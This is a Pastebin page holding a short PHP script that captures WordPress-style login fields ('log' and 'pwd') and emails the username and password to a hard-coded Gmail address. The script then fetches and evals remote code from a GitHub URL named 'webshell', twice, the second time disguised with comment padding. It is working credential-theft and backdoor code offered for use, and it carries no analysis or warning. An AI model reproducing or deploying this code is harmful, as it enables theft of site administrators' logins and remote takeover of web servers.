Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $subjek = 'RESUL';
- $mailto = 'muhrazky@gmail.com'; //masukin email lo disini
- //////////////////////////////////////
- $user = $_POST['log'];
- $pass = $_POST['pwd'];
- //////////////////////////////////////
- $body = <<<EOD
- <br><hr><br>
- <center><font size="4" ;" color="red">RESULT LOG ADMIN!<br></font>
- <font size="2" color="red">Username\Email :</font><font size"2" color="black">$user</font><br>
- <font size="2" color="red">Password : </font><font size"2" color="black">$pass</font> <br></center>
- EOD;
- $headers = "From: muhrazky@gmail.com\r\n";
- $headers .= "Content-type: text/html\r\n";
- $success = mail($mailto, $subjek, $body, $headers);
- ?>
- <?php
- $random = rand(1000,5000);
- ?>
- <?php eval("?>".file_get_contents("https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php"));/**/?>"));?>
- <?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/exploit-haxor/webshell/main/zz.php"));/**/?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement